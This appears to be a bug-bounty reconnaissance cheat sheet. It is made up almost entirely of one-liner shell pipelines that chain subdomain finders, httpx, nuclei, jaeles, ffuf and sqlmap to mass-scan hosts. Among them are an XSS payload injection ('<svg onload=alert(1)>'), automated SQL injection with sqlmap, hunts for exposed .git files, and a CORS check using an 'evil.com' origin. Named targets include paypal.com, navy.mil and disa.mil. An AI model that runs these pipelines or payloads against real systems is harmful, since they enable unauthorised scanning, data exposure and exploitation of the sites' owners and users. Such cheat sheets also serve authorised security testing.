shodan domain DOMAIN TO BOUNTY | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/

Open Redirect test using gf.

• [Explained command]

echo is a command that outputs the strings it is being passed as arguments. What to Waybackurls? Accept line-delimited domains on stdin, fetch known URLs from the Wayback Machine for .domain.com and output them on stdout. Httpx? is a fast and multi-purpose HTTP. GF? A wrapper around grep to avoid typing common patterns and anew Append lines from stdin to a file, but only if they don't already appear in the file. Outputs new lines to stdout too, removes duplicates.

echo "domain" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew

Using shodan to jaeles "How did I find a critical today? well as i said it was very simple, using shodan and jaeles".

• [Explained command]

shodan domain domain| awk '{print $3}'|  httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @

Using Chaos to jaeles "How did I find a critical today?.

• [Explained command]

To chaos this project to projectdiscovery, Recon subdomains, using httpx, if we see the output from chaos domain.com we need it to be treated as http or https, so we use httpx to get the results. We use anew, a tool that removes duplicates from @TomNomNom, to get the output treated for import into jaeles, where he will scan using his templates.

chaos -d domain | httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ 

Using shodan to jaeles

• [Explained command]

domain="domaintotest";shodan domain $domain | awk -v domain="$domain" '{print $1"."domain}'| httpx -threads 300 | anew shodanHostsUp | xargs -I@ -P3 sh -c 'jaeles -c 300 scan -s jaeles-signatures/ -u @'| anew JaelesShodanHosts 

Search to files using assetfinder and ffuf

• [Explained command]

assetfinder att.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w path.txt -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"'

HTTPX using new mode location and injection XSS using qsreplace.

• [Explained command]

httpx -l master.txt -silent -no-color -threads 300 -location 301,302 | awk '{print $2}' | grep -Eo '(http|https)://[^/"].*' | tr -d '[]' | anew  | xargs -I@ sh -c 'gospider -d 0 -s @' | tr ' ' '\n' | grep -Eo '(http|https)://[^/"].*' | grep "=" | qsreplace "<svg onload=alert(1)>" "'

Grap internal juicy paths and do requests to them.

• [Explained command]

export domain="https://target";gospider -s $domain -d 3 -c 300 | awk '/linkfinder/{print $NF}' | grep -v "http" | grep -v "http" | unfurl paths | anew | xargs -I@ -P50 sh -c 'echo $domain@ | httpx -silent -content-length'

Download to list bounty targets We inject using the sed .git/HEAD command at the end of each url.

• [Explained command]

wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv | cat domains.txt | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew

Using to findomain to SQLINJECTION.

• [Explained command]

findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1

Jaeles scan to bugbounty targets.

• [Explained command]

wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ jaeles scan -s /jaeles-signatures/ -u @

JLDC domain search subdomain, using rush and jaeles.

• [Explained command]

curl -s "https://jldc.me/anubis/subdomains/sony.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | httpx -silent -threads 300 | anew | rush -j 10 'jaeles scan -s /jaeles-signatures/ -u {}'

Chaos to search subdomains check cloudflareip scan port.

• [Explained command]

chaos -silent -d paypal.com | filter-resolved | cf-check | anew | naabu -rate 60000 -silent -verify | httpx -title -silent

Search JS to domains file.

• [Explained command]

cat FILE TO TARGET | httpx -silent | subjs | anew

Search JS using assetfinder, rush and hakrawler.

• [Explained command]

assetfinder -subs-only paypal.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | rush 'hakrawler -plain -linkfinder -depth 5 -url {}' | grep "paypal"

Search to CORS using assetfinder and rush

• [Explained command]

assetfinder fitbit.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin:evil.com" {} |  [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n\033[0;32m[VUL TO CORS] - {}\e[m"'

Search to js using hakrawler and rush & unew

• [Explained command]

cat hostsGospider | rush -j 100 'hakrawler -js -plain -usewayback -depth 6 -scope subs -url {} | unew hakrawlerHttpx'

XARGS to dirsearch brute force.

• [Explained command]

cat hosts | xargs -I@ sh -c 'python3 dirsearch.py -r -b -w path -u @ -i 200, 403, 401, 302 -e php,html,json,aspx,sql,asp,js' 

Assetfinder to run massdns.

• [Explained command]

assetfinder DOMAIN --subs-only | anew | massdns -r lists/resolvers.txt -t A -o S -w result.txt ; cat result.txt | sed 's/A.*//; s/CN.*// ; s/\..$//' | httpx -silent

Extract path to js

• [Explained command]

cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u 

Find subdomains and Secrets with jsubfinder

• [Explained command]

cat subdomsains.txt | httpx --silent | jsubfinder search -s

Search domains to Range-IPS.

• [Explained command]

cat dod1 | awk '{print $1}' | xargs -I@ sh -c 'prips @ | hakrevdns -r 1.1.1.1' | awk '{print $2}' | sed -r 's/.$//g' | httpx -silent -timeout 25 | anew 

Search new's domains using dnsgen.

• [Explained command]

xargs -a army1 -I@ sh -c 'echo @' | dnsgen - | httpx -silent -threads 10000 | anew newdomain

List ips, domain extract, using amass + wordlist

• [Explained command]

amass enum -src -ip -active -brute -d navy.mil -o domain ; cat domain | cut -d']' -f 2 | awk '{print $1}' | sort -u > hosts-amass.txt ; cat domain | cut -d']' -f2 | awk '{print $2}' | tr ',' '\n' | sort -u > ips-amass.txt ; curl -s "https://crt.sh/?q=%.navy.mil&output=json" | jq '.[].name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u > hosts-crtsh.txt ; sed 's/$/.navy.mil/' dns-Jhaddix.txt_cleaned > hosts-wordlist.txt ; cat hosts-amass.txt hosts-crtsh.txt hosts-wordlist.txt | sort -u > hosts-all.txt

Search domains using amass and search vul to nuclei.

• [Explained command]

amass enum -passive -norecursive -d disa.mil -o domain ; httpx -l domain -silent -threads 10 | nuclei -t PATH -o result -timeout 30 

Verify to cert using openssl.

• [Explained command]

sed -ne 's/^\( *\)Subject:/\1/p;/X509v3 Subject Alternative Name/{
    N;s/^.*\n//;:a;s/^\( *\)\(.*\), /\1\2\n\1/;ta;p;q; }' < <(
    openssl x509 -noout -text -in <(
        openssl s_client -ign_eof 2>/dev/null <<<$'HEAD / HTTP/1.0\r\n\r' \
            -connect hackerone.com:443 ) )

Search domains using openssl to cert.

• [Explained command]

xargs -a recursivedomain -P50 -I@ sh -c 'openssl s_client -connect @:443 2>&1 '| sed -E -e 's/[[:blank:]]+/\n/g' | httpx -silent -threads 1000 | anew 

Search domains over IP/ASN using Hurricane Electric.

• [Explained command]

nslookup hackerone.com | awk '/Address: / {print $2}' | hednsextractor -silent -only-domains | httpx -silent -title -tech-detect -status-code 

Search domains using Hudson Rock's cybercrime intelligence data

• [Explained command]

https://cavalier.hudsonrock.com/api/json/v2/osint-tools/search-by-domain?domain=tesla.com 

Mass hunting exposed git from a ASN/IP with hednsextractor.

• [Explained command]

hednsextractor -target "your target" -silent | httpx -path /.git/config -status-code -ms 200 -silent